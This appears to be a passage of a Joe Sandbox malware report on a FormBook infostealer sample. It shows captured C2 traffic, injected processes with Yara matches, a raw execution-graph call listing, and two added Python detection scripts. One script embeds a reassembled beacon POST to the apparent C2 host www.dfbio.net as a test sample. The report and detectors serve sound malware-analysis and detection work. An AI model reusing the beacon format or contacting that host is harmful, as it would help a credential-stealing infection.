71 57 [TRUNCATED]
                      Data Ascii: 486X{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                      Sep 3, 2024 12:48:36.350668907 CEST | 1224 | IN | Data Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                      Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua3e6;<AMNGD'\`X
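The two HTTP sessions above are the injected process beaconing to its C2: a POST to a one-directory path, Connection: close, Origin and Referer built from the Host and the path itself, a hard-coded Chrome/47.0.2504.0 User-Agent, and a body that is one short field name (TJY8) carrying raw base64, with + and / left unencoded as no browser form submission would leave them. The server's 404 reply is not needed to spot this. As an added example, not part of the Joe Sandbox report, the Python below scores a raw request against exactly those traits. The session-29 POST is reassembled from the headers and body shown on this page; the benign login request, the regexes, the indicator names and the 4-of-5 threshold are my own constructions, not a FormBook specification.

```python
import base64
import binascii
import re

# Constructed sample: the first POST of HTTP session 29 in this report, reassembled
# from the request line, headers and form body shown above.
SAMPLE_C2_POST = (
    "POST /yzen/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-us\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 201\r\n"
    "Host: www.dfbio.net\r\n"
    "Origin: http://www.dfbio.net\r\n"
    "Referer: http://www.dfbio.net/yzen/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36\r\n"
    "\r\n"
    "TJY8=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8"
    "ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xA"
    "c2wXbNH66dU9xL6YD0/OFBcw=="
)

# Constructed benign comparison: an ordinary browser form login, not taken from the report.
SAMPLE_BENIGN_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: intranet.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: https://intranet.example.com/\r\n"
    "Connection: keep-alive\r\n"
    "Content-Length: 27\r\n"
    "\r\n"
    "user=alice&password=hunter2"
)

FORM_BODY_RE = re.compile(r"^([A-Za-z0-9]{3,6})=([A-Za-z0-9+/]+={0,2})$")
SHORT_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
SUSPICIOUS_THRESHOLD = 4  # my own cut-off: 4 of the 5 traits below


def parse_http_request(raw: str):
    """Split a raw request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def formbook_http_indicators(raw: str) -> dict:
    """Score one request against the traits of the beacons captured in this report."""
    method, path, headers, body = parse_http_request(raw)
    host = headers.get("host", "")
    flags = {
        # the beacon closes the connection after every POST
        "post_connection_close": method == "POST"
        and headers.get("connection", "").lower() == "close",
        # C2 path is a single short directory, e.g. /yzen/
        "short_dir_path": bool(SHORT_PATH_RE.match(path)),
        # Origin and Referer are synthesised from Host and the request path itself
        "self_referer": headers.get("referer") == f"http://{host}{path}"
        and headers.get("origin") == f"http://{host}",
        # hard-coded, years-old Chrome build in the User-Agent
        "fixed_chrome47_ua": "Chrome/47.0.2504.0" in headers.get("user-agent", ""),
        # body is exactly one short field carrying raw base64 (set below)
        "single_base64_field": False,
    }
    field_name = None
    match = FORM_BODY_RE.match(body)
    if match:
        field_name, value = match.groups()
        try:
            base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            pass
        else:
            # '+' and '/' unencoded in a form body: a browser would percent-encode them
            flags["single_base64_field"] = (
                ("+" in value or "/" in value) and len(value) % 4 == 0
            )
    score = sum(flags.values())
    return {
        "flags": flags,
        "score": score,
        "field_name": field_name,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


if __name__ == "__main__":
    for label, sample in (("session-29 POST", SAMPLE_C2_POST), ("benign login", SAMPLE_BENIGN_POST)):
        result = formbook_http_indicators(sample)
        print(label, result["score"], result["suspicious"], result["flags"])
```

Run as-is to see the two scores; to triage a capture, feed each reassembled request to formbook_http_indicators and review anything that crosses the threshold together with the destination, since the self-built Referer/Origin pair and the unencoded base64 field are the traits a real browser never produces.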



                      Target ID: 0
                      Start time: 06:45:29
                      Start date: 03/09/2024
                      Path: C:\Users\user\Desktop\p4LNUqyKZM.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Users\user\Desktop\p4LNUqyKZM.exe"
                      Imagebase: 0x980000
                      File size: 1'250'816 bytes
                      MD5 hash: 4214BE98801C44F69B60490A3321E940
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: low
                      Has exited: true

                      Target ID: 1
                      Start time: 06:45:30
                      Start date: 03/09/2024
                      Path: C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Users\user\Desktop\p4LNUqyKZM.exe"
                      Imagebase: 0xf40000
                      File size: 46'504 bytes
                      MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation: high
                      Has exited: true

                      Target ID: 2
                      Start time: 06:45:42
                      Start date: 03/09/2024
                      Path: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe"
                      Imagebase: 0x1b0000
                      File size: 140'800 bytes
                      MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation: high
                      Has exited: false

                      Target ID: 3
                      Start time: 06:45:43
                      Start date: 03/09/2024
                      Path: C:\Windows\SysWOW64\chkntfs.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Windows\SysWOW64\chkntfs.exe"
                      Imagebase: 0x950000
                      File size: 19'968 bytes
                      MD5 hash: A9B42ED1B14BB22EF07CCC8228697408
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation: moderate
                      Has exited: false

                      Target ID: 7
                      Start time: 06:45:56
                      Start date: 03/09/2024
                      Path: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe"
                      Imagebase: 0x1b0000
                      File size: 140'800 bytes
                      MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation: high
                      Has exited: false

                      Target ID: 8
                      Start time: 06:46:08
                      Start date: 03/09/2024
                      Path: C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase: 0x7ff6bf500000
                      File size: 676'768 bytes
                      MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true
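Three things in the process list above deserve a second look. Target 1 is svchost.exe loaded from SysWOW64 but carries the dropper's own command line, the usual footprint of a hollowed process; Targets 1 and 3 are Microsoft system binaries whose memory matched the FormBook Yara rules, so they are injection targets rather than droppers; and Targets 2 and 7 run from a randomly named directory directly under Program Files (x86). As an added example, not part of the Joe Sandbox report, the Python below runs those three checks over the six Target blocks, reduced to path, command line and whether a FormBook Yara hit was reported in that process's memory (constructed input, transcribed from this page). The case-switch heuristic, its thresholds and the indicator names are my own choices. Firefox (Target 8) serves as a control: its path and command line differ only in letter case, which the comparison has to ignore.

```python
from pathlib import PureWindowsPath

# Constructed input: the Target blocks of this report reduced to the fields used below.
# yara_formbook is True where the report lists a FormBook Yara match for that process.
RANDOM_DIR = r"lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW"
SAMPLE_PROCESSES = [
    {"target_id": 0, "path": r"C:\Users\user\Desktop\p4LNUqyKZM.exe",
     "cmdline": r'"C:\Users\user\Desktop\p4LNUqyKZM.exe"', "yara_formbook": False},
    {"target_id": 1, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\p4LNUqyKZM.exe"', "yara_formbook": True},
    {"target_id": 2, "path": rf"C:\Program Files (x86)\{RANDOM_DIR}\SCsLZYqthBle.exe",
     "cmdline": rf'"C:\Program Files (x86)\{RANDOM_DIR}\SCsLZYqthBle.exe"', "yara_formbook": True},
    {"target_id": 3, "path": r"C:\Windows\SysWOW64\chkntfs.exe",
     "cmdline": r'"C:\Windows\SysWOW64\chkntfs.exe"', "yara_formbook": True},
    {"target_id": 7, "path": rf"C:\Program Files (x86)\{RANDOM_DIR}\SCsLZYqthBle.exe",
     "cmdline": rf'"C:\Program Files (x86)\{RANDOM_DIR}\SCsLZYqthBle.exe"', "yara_formbook": True},
    {"target_id": 8, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara_formbook": False},
]

PROGRAM_FILES_DIRS = ("program files", "program files (x86)")
MIN_RANDOM_LEN = 16          # my threshold: shorter names are too easy to misjudge
MIN_CASE_SWITCH_RATIO = 0.25 # my threshold: "MozillaFirefox" scores about 0.08


def first_token(cmdline: str) -> str:
    """Return the image path a command line starts with, honouring a quoted first token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def case_switch_ratio(name: str) -> float:
    """Fraction of adjacent character pairs that flip between upper and lower case."""
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return switches / max(len(name) - 1, 1)


def looks_random(name: str) -> bool:
    """Long, purely alphanumeric, and flipping case far more often than a real product name."""
    return (len(name) >= MIN_RANDOM_LEN and name.isalnum()
            and case_switch_ratio(name) >= MIN_CASE_SWITCH_RATIO)


def triage_process(rec: dict) -> list:
    """Return the indicator names that apply to one process record."""
    indicators = []
    image = PureWindowsPath(rec["path"])
    launched_as = PureWindowsPath(first_token(rec["cmdline"]))
    # 1. Hollowing / injection: the image on disk is not what the command line says
    #    was started (Target 1: svchost.exe under p4LNUqyKZM.exe's command line).
    #    Compare case-insensitively: firefox.exe vs Firefox.exe is not a mismatch.
    if image.name.lower() != launched_as.name.lower():
        indicators.append("image_cmdline_mismatch")
    # 2. FormBook code in the memory of a Windows system binary: that binary was
    #    injected into; it is not the dropper.
    if rec["yara_formbook"] and str(image).lower().startswith("c:\\windows\\"):
        indicators.append("yara_hit_in_system_binary")
    # 3. Persistence copy living in a random-looking directory directly under Program Files.
    parts = image.parts  # ('C:\\', 'Program Files (x86)', '<dir>', '<exe>')
    if (len(parts) >= 4 and parts[1].lower() in PROGRAM_FILES_DIRS
            and looks_random(parts[2])):
        indicators.append("random_program_files_dir")
    return indicators


def triage_process_list(procs: list) -> list:
    return [{"target_id": p["target_id"], "path": p["path"],
             "indicators": triage_process(p)} for p in procs]


if __name__ == "__main__":
    for row in triage_process_list(SAMPLE_PROCESSES):
        print(row["target_id"], row["path"], row["indicators"] or "-")
```

On a live host the same three checks run over the output of a process enumerator that reports both the image path and the command line (Sysmon event 1, for example); the Yara field would then come from a memory scan rather than from a sandbox report.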


                        Execution Graph

                        Execution Coverage: 3.2%
                        Dynamic/Decrypted Code Coverage: 1.5%
                        Signature Coverage: 2.9%
                        Total number of Nodes: 2000
                        Total number of Limit Nodes: 51

                        [Execution graph: the node and edge listing of the report's interactive graph viewer is omitted here, as it does not render as text. API calls named on the graph nodes include GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo, FreeLibrary, GetVersionExW, GetTempPathW, GetModuleFileNameW, GetFullPathNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetStartupInfoW, GetModuleHandleW, GetStdHandle, GetFileType, GetConsoleMode, ReadFile, ReadConsoleW, RtlAllocateHeap, RtlFreeHeap, RaiseException, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObjectEx, SetEvent, ResetEvent, Sleep, GetLastError, and a PEB access node labelled GetPEB.]
__Init_thread_footer 96849->96850 96851 9d4beb 96849->96851 96849->96852 97078 9901e0 256 API calls 2 library calls 96849->97078 97079 9906a0 41 API calls messages 96849->97079 96850->96849 97083 9f359c 82 API calls __wsopen_s 96851->97083 96852->96845 97080 9f359c 82 API calls __wsopen_s 96852->97080 97084 9edbbe lstrlenW 96853->97084 97089 989c6e 96856->97089 96859 99fddb 22 API calls 96861 99f02b 96859->96861 96862 99fe0b 22 API calls 96861->96862 96864 99f03c 96862->96864 96863 9df0a8 96902 99f0a4 96863->96902 97187 9f9caa 39 API calls 96863->97187 97132 986246 96864->97132 96868 9df10a 96870 99f0b1 96868->96870 96871 9df112 96868->96871 96869 98a961 22 API calls 96872 99f04f 96869->96872 97103 99fa5b 96870->97103 96873 98b567 39 API calls 96871->96873 96874 986246 CloseHandle 96872->96874 96880 99f0b8 96873->96880 96876 99f056 96874->96876 97136 987510 96876->97136 96879 986246 CloseHandle 96881 99f06c 96879->96881 96882 9df127 96880->96882 96883 99f0d3 96880->96883 97159 985745 96881->97159 96886 99fe0b 22 API calls 96882->96886 97108 986270 96883->97108 96889 9df12c 96886->96889 96893 9df140 96889->96893 97188 99f866 ReadFile SetFilePointerEx 96889->97188 96890 99f085 97167 9853de 96890->97167 96891 9df0a0 97186 986216 CloseHandle messages 96891->97186 96904 9df144 __fread_nolock 96893->96904 97189 9f0e85 22 API calls ___scrt_fastfail 96893->97189 96896 99f0ea 96896->96904 97183 9862b5 22 API calls 96896->97183 96900 99f093 97182 9853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96900->97182 96902->96870 97127 98b567 96902->97127 96903 99f0fe 96907 99f138 96903->96907 96908 986246 CloseHandle 96903->96908 96905 9df069 97185 9eccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96905->97185 96906 99f09a 96906->96902 96906->96905 96907->96798 96909 99f12c 96908->96909 96909->96907 97184 986216 CloseHandle messages 96909->97184 96911 9df080 96911->96902 97246 a07f59 96913->97246 96915 a095af 96915->96798 96917 984f43 96916->96917 96921 
984f4a 96916->96921 97352 9ae678 96917->97352 96919 984f59 96919->96798 96920 984f6a FreeLibrary 96920->96919 96921->96919 96921->96920 96923 a07f59 120 API calls 96922->96923 96924 a0959b 96923->96924 96924->96798 96926 9f7474 96925->96926 96927 9f7469 96925->96927 96928 9f7554 96926->96928 96931 98a961 22 API calls 96926->96931 96929 98b567 39 API calls 96927->96929 96930 99fddb 22 API calls 96928->96930 96971 9f76a4 96928->96971 96929->96926 96932 9f7587 96930->96932 96933 9f7495 96931->96933 96934 99fe0b 22 API calls 96932->96934 96935 98a961 22 API calls 96933->96935 96936 9f7598 96934->96936 96937 9f749e 96935->96937 96938 986246 CloseHandle 96936->96938 96939 987510 53 API calls 96937->96939 96940 9f75a3 96938->96940 96941 9f74aa 96939->96941 96942 98a961 22 API calls 96940->96942 97581 98525f 96941->97581 96944 9f75ab 96942->96944 96946 986246 CloseHandle 96944->96946 96945 9f74bf 97623 986350 96945->97623 96947 9f75b2 96946->96947 96949 987510 53 API calls 96947->96949 96951 9f75be 96949->96951 96953 986246 CloseHandle 96951->96953 96952 9f754a 96956 98b567 39 API calls 96952->96956 96955 9f75c8 96953->96955 96954 9ed4ce 4 API calls 96957 9f7502 96954->96957 96960 985745 5 API calls 96955->96960 96956->96928 96957->96952 96958 9f7506 96957->96958 96959 989cb3 22 API calls 96958->96959 96961 9f7513 96959->96961 96962 9f75e2 96960->96962 97632 9ed2c1 26 API calls 96961->97632 96964 9f76de GetLastError 96962->96964 96965 9f75ea 96962->96965 96966 9f76f7 96964->96966 96967 9853de 27 API calls 96965->96967 97636 986216 CloseHandle messages 96966->97636 96970 9f75f8 96967->96970 96969 9f751c 96969->96952 97633 9853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96970->97633 96971->96798 96973 9f75ff 96974 9f7645 96973->96974 96977 9f7619 96973->96977 96975 99fddb 22 API calls 96974->96975 96976 9f7679 96975->96976 96978 98a961 22 API calls 96976->96978 97634 9eccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96977->97634 96980 9f7686 
96978->96980 96980->96971 97635 9e417d 22 API calls __fread_nolock 96980->97635 96983 98a961 22 API calls 96982->96983 96984 9f6f1d 96983->96984 96985 98a961 22 API calls 96984->96985 96986 9f6f26 96985->96986 96987 9f6f3a 96986->96987 96988 98b567 39 API calls 96986->96988 96989 987510 53 API calls 96987->96989 96988->96987 96990 9f6f57 _wcslen 96989->96990 96991 9f70bf 96990->96991 96992 9f6fbc 96990->96992 97061 9f70e9 96990->97061 97652 984ecb 96991->97652 96993 987510 53 API calls 96992->96993 96996 9f6fc8 96993->96996 97000 98a8c7 22 API calls 96996->97000 97002 9f6fdb 96996->97002 96997 9f70e5 96999 98a961 22 API calls 96997->96999 96997->97061 96998 984ecb 94 API calls 96998->96997 97001 9f711a 96999->97001 97000->97002 97004 98a961 22 API calls 97001->97004 97003 9f7027 97002->97003 97005 9f7005 97002->97005 97008 98a8c7 22 API calls 97002->97008 97006 987510 53 API calls 97003->97006 97007 9f7126 97004->97007 97009 9833c6 22 API calls 97005->97009 97010 9f7034 97006->97010 97011 98a961 22 API calls 97007->97011 97008->97005 97012 9f700f 97009->97012 97013 9f703d 97010->97013 97014 9f7047 97010->97014 97015 9f712f 97011->97015 97017 987510 53 API calls 97012->97017 97018 98a8c7 22 API calls 97013->97018 97783 9ee199 GetFileAttributesW 97014->97783 97016 98a961 22 API calls 97015->97016 97021 9f7138 97016->97021 97022 9f701b 97017->97022 97018->97014 97020 9f7050 97023 9f7063 97020->97023 97026 984c6d 22 API calls 97020->97026 97024 987510 53 API calls 97021->97024 97025 986350 22 API calls 97022->97025 97028 987510 53 API calls 97023->97028 97034 9f7069 97023->97034 97027 9f7145 97024->97027 97025->97003 97026->97023 97029 98525f 22 API calls 97027->97029 97030 9f70a0 97028->97030 97031 9f7166 97029->97031 97784 9ed076 57 API calls 97030->97784 97033 984c6d 22 API calls 97031->97033 97035 9f7175 97033->97035 97034->97061 97036 9f71a9 97035->97036 97038 984c6d 22 API calls 97035->97038 97037 98a8c7 22 API calls 97036->97037 97039 9f71ba 97037->97039 97040 
9f7186 97038->97040 97041 986350 22 API calls 97039->97041 97040->97036 97043 986b57 22 API calls 97040->97043 97042 9f71c8 97041->97042 97044 986350 22 API calls 97042->97044 97045 9f719b 97043->97045 97046 9f71d6 97044->97046 97047 986b57 22 API calls 97045->97047 97048 986350 22 API calls 97046->97048 97047->97036 97049 9f71e4 97048->97049 97050 987510 53 API calls 97049->97050 97051 9f71f0 97050->97051 97674 9ed7bc 97051->97674 97053 9f7201 97054 9ed4ce 4 API calls 97053->97054 97055 9f720b 97054->97055 97056 987510 53 API calls 97055->97056 97059 9f7239 97055->97059 97057 9f7229 97056->97057 97728 9f2947 97057->97728 97060 984f39 68 API calls 97059->97060 97060->97061 97061->96798 97062->96790 97063->96758 97064->96760 97065->96770 97066->96775 97067->96775 97068->96756 97069->96798 97070->96798 97071->96798 97072->96795 97073->96798 97074->96823 97075->96824 97076->96826 97077->96828 97078->96849 97079->96849 97080->96845 97081->96845 97082->96851 97083->96845 97085 9edbdc GetFileAttributesW 97084->97085 97086 9ed4d5 97084->97086 97085->97086 97087 9edbe8 FindFirstFileW 97085->97087 97086->96798 97087->97086 97088 9edbf9 FindClose 97087->97088 97088->97086 97090 989c7e 97089->97090 97091 9cf545 97089->97091 97096 99fddb 22 API calls 97090->97096 97092 9cf556 97091->97092 97093 986b57 22 API calls 97091->97093 97094 98a6c3 22 API calls 97092->97094 97093->97092 97095 9cf560 97094->97095 97095->97095 97097 989c91 97096->97097 97098 989c9a 97097->97098 97099 989cac 97097->97099 97100 989cb3 22 API calls 97098->97100 97101 98a961 22 API calls 97099->97101 97102 989ca2 97100->97102 97101->97102 97102->96859 97102->96863 97190 9854c6 97103->97190 97106 9854c6 3 API calls 97107 99fa9a 97106->97107 97107->96880 97109 99fe0b 22 API calls 97108->97109 97110 986295 97109->97110 97111 99fddb 22 API calls 97110->97111 97112 9862a3 97111->97112 97113 99f141 97112->97113 97114 99f188 97113->97114 97115 99f14c 97113->97115 97116 98a6c3 22 API calls 97114->97116 97115->97114 
97119 99f15b 97115->97119 97123 9ecaeb 97116->97123 97117 99f170 97196 99f18e 97117->97196 97119->97117 97120 99f17d 97119->97120 97203 9ecbf2 26 API calls 97120->97203 97121 9ecb1a 97121->96896 97123->97121 97204 9eca89 ReadFile SetFilePointerEx 97123->97204 97205 9849bd 22 API calls __fread_nolock 97123->97205 97124 99f179 97124->96896 97128 98b578 97127->97128 97129 98b57f 97127->97129 97128->97129 97241 9a62d1 39 API calls 97128->97241 97129->96868 97131 98b5c2 97131->96868 97133 98625f 97132->97133 97134 986250 97132->97134 97133->97134 97135 986264 CloseHandle 97133->97135 97134->96869 97135->97134 97137 987525 97136->97137 97152 987522 97136->97152 97138 98752d 97137->97138 97139 98755b 97137->97139 97242 9a51c6 26 API calls 97138->97242 97142 98756d 97139->97142 97149 9c500f 97139->97149 97150 9c50f6 97139->97150 97243 99fb21 51 API calls 97142->97243 97143 98753d 97147 99fddb 22 API calls 97143->97147 97144 9c510e 97144->97144 97148 987547 97147->97148 97151 989cb3 22 API calls 97148->97151 97153 99fe0b 22 API calls 97149->97153 97158 9c5088 97149->97158 97245 9a5183 26 API calls 97150->97245 97151->97152 97152->96879 97154 9c5058 97153->97154 97155 99fddb 22 API calls 97154->97155 97156 9c507f 97155->97156 97157 989cb3 22 API calls 97156->97157 97157->97158 97244 99fb21 51 API calls 97158->97244 97160 98575c CreateFileW 97159->97160 97161 9c4035 97159->97161 97162 98577b 97160->97162 97161->97162 97163 9c403b CreateFileW 97161->97163 97162->96890 97162->96891 97163->97162 97164 9c4063 97163->97164 97165 9854c6 3 API calls 97164->97165 97166 9c406e 97165->97166 97166->97162 97168 9853f3 97167->97168 97181 9853f0 messages 97167->97181 97169 9854c6 3 API calls 97168->97169 97168->97181 97170 985410 97169->97170 97171 98541d 97170->97171 97172 9c3f4b 97170->97172 97174 99fe0b 22 API calls 97171->97174 97173 99fa5b 3 API calls 97172->97173 97173->97181 97175 985429 97174->97175 97176 985722 22 API calls 97175->97176 97177 985433 97176->97177 97178 989a40 2 API 
calls 97177->97178 97179 98543f 97178->97179 97180 9854c6 3 API calls 97179->97180 97180->97181 97181->96900 97182->96906 97183->96903 97184->96907 97185->96911 97186->96863 97187->96863 97188->96893 97189->96904 97195 9854dd 97190->97195 97191 9c3f9c SetFilePointerEx 97192 985564 SetFilePointerEx SetFilePointerEx 97193 985530 97192->97193 97193->97106 97194 9c3f8b 97194->97191 97195->97191 97195->97192 97195->97193 97195->97194 97206 99f1d8 97196->97206 97202 99f1c1 97202->97124 97203->97124 97204->97123 97205->97123 97207 99fe0b 22 API calls 97206->97207 97208 99f1ef 97207->97208 97209 99fddb 22 API calls 97208->97209 97210 99f1a6 97209->97210 97211 9897b6 97210->97211 97225 989a1e 97211->97225 97213 9897c7 97215 9897fc 97213->97215 97232 989a40 97213->97232 97238 989b01 22 API calls __fread_nolock 97213->97238 97215->97202 97217 986e14 MultiByteToWideChar 97215->97217 97218 986e40 97217->97218 97219 986e87 97217->97219 97220 99fe0b 22 API calls 97218->97220 97221 98a6c3 22 API calls 97219->97221 97222 986e55 MultiByteToWideChar 97220->97222 97224 986e7b 97221->97224 97240 986e90 22 API calls __fread_nolock 97222->97240 97224->97202 97226 9cf378 97225->97226 97227 989a2f 97225->97227 97228 99fddb 22 API calls 97226->97228 97227->97213 97229 9cf382 97228->97229 97230 99fe0b 22 API calls 97229->97230 97231 9cf397 97230->97231 97233 989abb 97232->97233 97236 989a4e 97232->97236 97239 99e40f SetFilePointerEx 97233->97239 97235 989a7c 97235->97213 97236->97235 97237 989a8c ReadFile 97236->97237 97237->97235 97237->97236 97238->97213 97239->97236 97240->97224 97241->97131 97242->97143 97243->97143 97244->97150 97245->97144 97247 987510 53 API calls 97246->97247 97248 a07f90 97247->97248 97272 a07fd5 messages 97248->97272 97284 a08cd3 97248->97284 97250 a08281 97251 a0844f 97250->97251 97256 a0828f 97250->97256 97325 a08ee4 60 API calls 97251->97325 97254 a0845e 97254->97256 97257 a0846a 97254->97257 97255 987510 53 API calls 